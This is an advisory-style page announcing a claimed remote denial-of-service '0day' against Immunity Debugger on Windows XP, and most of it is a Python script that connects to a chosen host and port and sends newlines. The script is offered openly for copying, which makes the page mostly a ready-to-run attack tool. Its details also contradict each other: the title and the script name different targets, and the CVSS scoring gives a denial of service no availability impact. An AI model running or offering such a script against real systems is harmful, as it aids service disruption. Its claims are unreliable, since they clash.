Immunity Debugger Remote Denial of Service 0Day

2012-04-18 / 2012-08-15
Credit: InfoSec
Risk: Low
Local: No
Remote: Yes
CWE: CWE-noinfo


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

Tested against versions 1.76 and 1.80 on Windows XP distributions.
Has not been tested for potential privilege escalation vectors.

We first wrote about Immunity Debugger here: http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/

Discovered by a student that wishes to remain anonymous in the course CTF.

This 0day exploit for Windows was discovered by a student in the InfoSec Institute Ethical Hacking class, during an evening CTF exercise. The student wishes to remain anonymous; he has contributed a Python version of the 0day. A patch that can be applied to Windows has not been made available.

You can find a Python version of the exploit to copy and paste here:

#!/usr/bin/python
#Windows XP denial of service 0day exploit discovered on 4.9.12 by InfoSec Institute student
#For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.html
import sys
import os
import time
import getopt
import socket

class Error(Exception):
    def __init__(self, error):
        self.errorStr=error

    def __str__(self):
        return repr(self.errorStr)

class Exploit():
    def __init__(self, targetHost, targetPort):
        self.targetHost = targetHost

    def exploit(self, targetHost, targetPort):
        try:
            socket.inet_aton(targetHost)
            s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
            s.connect((targetHost,targetPort))
        except socket.error:
            raise Error("Unable to exploit (Connect failed.)")
            sys.exit(0)
        # exploit
        try:
            s.sendto("\n\n\n", (targetHost, targetPort))
        except:
            raise Error("Unable to exploit (Exploit failed.)")

def usage():
    print "[!] Usage:"
    print " ( -h, --help ):"
    print " Print this message."
    print " ( --targetHost= ): Target host."
    print " --targetHost=127.0.0.1"
    print " ( --targetPort= ): Target port."
    print " --targetPort=8888"

def main():
    print "[$] Windows XP 0Day"
    try:
        opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "targetHost=", "targetPort="])
    except getopt.GetoptError, err:
        # Print help information and exit:
        print '[!] Parameter error:' + str(err) # Will print something like "option -a not recognized"
        usage()
        sys.exit(0)

    targetHost=None
    targetPort=None
    for opt, arg in opts:
        if opt in ("-h", "--help"):
            usage()
            sys.exit(0)
        elif opt =="--targetHost":
            targetHost=arg
        elif opt =="--targetPort":
            targetPort=arg
        else:
            # I would be assuming to say we'll never get here.
            print "[!] Parameter error."
            usage()
            sys.exit(0)

    if not targetHost:
        print "[!] Parameter error: targetHost not set."
        usage()
        sys.exit(0)

    if not targetPort:
        print "[!] Parameter error: targetPort not set."
        usage()
        sys.exit(0)

    exploit = Exploit(targetHost, targetPort)
    print "[*] Attempting to exploit:"
    try:
        exploit.exploit(targetHost, int(targetPort))
    except Error as error:
        print "[!] Exploit Error: %s" % (error.errorStr)
        exit(0)
    print "[*] Exploit appears to have worked."

# Standard boilerplate to call the main() function to begin
# the program.
if __name__=='__main__':
    main()

References:

http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/

